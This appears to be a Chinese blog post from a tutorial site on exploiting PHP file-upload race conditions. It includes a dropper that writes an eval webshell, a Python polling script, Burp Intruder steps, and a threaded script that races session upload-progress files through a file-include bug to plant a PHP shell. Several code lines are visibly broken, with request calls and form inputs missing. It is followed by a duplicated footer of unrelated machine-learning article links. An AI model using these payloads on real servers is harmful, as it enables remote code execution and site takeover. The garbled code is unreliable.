文件上传之条件竞争--688IT编程网

⽂件上传之条件竞争测试demo：

<html>

<body>

<form action="" method="post"

enctype="multipart/form-data">

<label for="file">Filename:</label>

</form>

</body>

</html>

<?php

if (!empty($_FILES)) {

move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);

unlink($_FILES['file']['name']);

}

shell⽂件内容：

<?PHP

echo md5(1);

fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>');

⼀直访问上传⽂件的py脚本：

# coding:utf-8

import requests

def main():

i=0

while 1:

try:

print(i,end='\r')

a = ("aaa.io/sssss.php")

if "c4ca4238a0b923820dcc509a6f75849b" :

print("OK")

break

except Exception as e:

pass

i+=1

if __name__ == '__main__':

main()

其中的c4ca4238a0b923820dcc509a6f75849b = md5(1)

burp设置：->发送到Intrudermo模块->

然后同时运⾏我们的py脚本，和开启burp爆破，顺序⽆所谓，差不多挨着时间开启即可。

另⼀个和session⽂件进⾏竞争

demo：

<?php

if (isset($_GET['file'])) {

include './' . $_GET['file'];

}

这种情况在我们没办法上传⽂件的时候，怎么利⽤呢？那就是包含session⽂件。

我们知道控制session开启的函数session_start()，当没有使⽤函数的时候怎么办呢？

session下存在upload_progress属性，⽤来记录⽂件上传进度，并且默认是开启状态。

也就是当我们的POST数据包中存在PHP_SESSION_UPLOAD_PROGRESS字段的时候，⽆需调⽤session_start()函数，也可初始化session。但是默认会在结尾进⾏清除，所以我们需要利⽤条件竞争。

证明的demo：1.php

<html>

<body>

<form action="" method="post"

enctype="multipart/form-data">

<label for="file">Filename:</label>

</form>

</body>

</html>

<?php

注意：<input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="888"/>⼀定要在<input type="file" name="file"/>前⾯，不然没办法控制⽣成的session⽂件名。

漏洞利⽤脚本：

import io

import requests

import threading

sessid = 'ph1'

def t1(session):

while True:

f = io.BytesIO(b'a' * 1024 * 50)

response = session.post(

'localhost/2.php',

data={'PHP_SESSION_UPLOAD_PROGRESS': '<?=file_put_contents("shell123.php","<?=phpinfo();?>")?>'},

files={'file': ('a.txt', f)},

cookies={'PHPSESSID': sessid}

)

def t2(session):

while True:

response = (f'localhost/2.php?file=../Extensions/tmp/tmp/sess_{sessid}')

)

with requests.session() as session:

t1 = threading.Thread(target=t1, args=(session, ))

t1.daemon = True

t1.start()

t2(session)

inputtypefile不上传文件修改对应的访问路径，和 session⽂件路径，即可。成功后⽣成shell123.php⽂件。

688IT编程网

文件上传之条件竞争

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林特征选择原理

自动驾驶系统中的随机森林算法解析

随机森林算法及其在生物信息学中的应用

监督学习中的随机森林算法解析(六)

随机森林算法在数据分析中的应用

机器学习——随机森林,RandomForestClassifier参数含义详解

随机森林的算法

随机森林算法作用

监督学习中的随机森林算法解析(十)

随机森林算法案例

随机森林案例

二分类问题常用的模型

绘制ssd框架训练流程

一种基于信息熵和DTW的多维时间序列相似性度量算法

SVM训练过程范文

如何使用支持向量机进行股票预测与交易分析

二分类交叉熵损失函数binary

tinybert_训练中文文本分类模型_概述说明

基于门控可形变卷积和分层Transformer的图像修复模型及其应用

人工智能开发技术的测试和评估方法

最新文章

基于随机森林的数据分类算法改进

人工智能中的智能识别与分类技术

基于人工智能技术的随机森林算法在医疗数据挖掘中的应用

随机森林回归模型的建模步骤

r语言随机森林预测模型校准曲线

《2024年随机森林算法优化研究》范文

标签列表

688IT编程网

文件上传之条件竞争

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林特征选择原理

自动驾驶系统中的随机森林算法解析

随机森林算法及其在生物信息学中的应用

监督学习中的随机森林算法解析(六)

随机森林算法在数据分析中的应用

机器学习——随机森林,RandomForestClassifier参数含义详解

随机森林 的算法

随机森林算法作用

监督学习中的随机森林算法解析(十)

随机森林算法案例

随机森林案例

二分类问题常用的模型

绘制ssd框架训练流程

一种基于信息熵和DTW的多维时间序列相似性度量算法

SVM训练过程范文

如何使用支持向量机进行股票预测与交易分析

二分类交叉熵损失函数binary

tinybert_训练中文文本分类模型_概述说明

基于门控可形变卷积和分层Transformer的图像修复模型及其应用

人工智能开发技术的测试和评估方法

最新文章

基于随机森林的数据分类算法改进

人工智能中的智能识别与分类技术

基于人工智能技术的随机森林算法在医疗数据挖掘中的应用

随机森林回归模型的建模步骤

r语言随机森林预测模型校准曲线

《2024年随机森林算法优化研究》范文

标签列表

随机森林的算法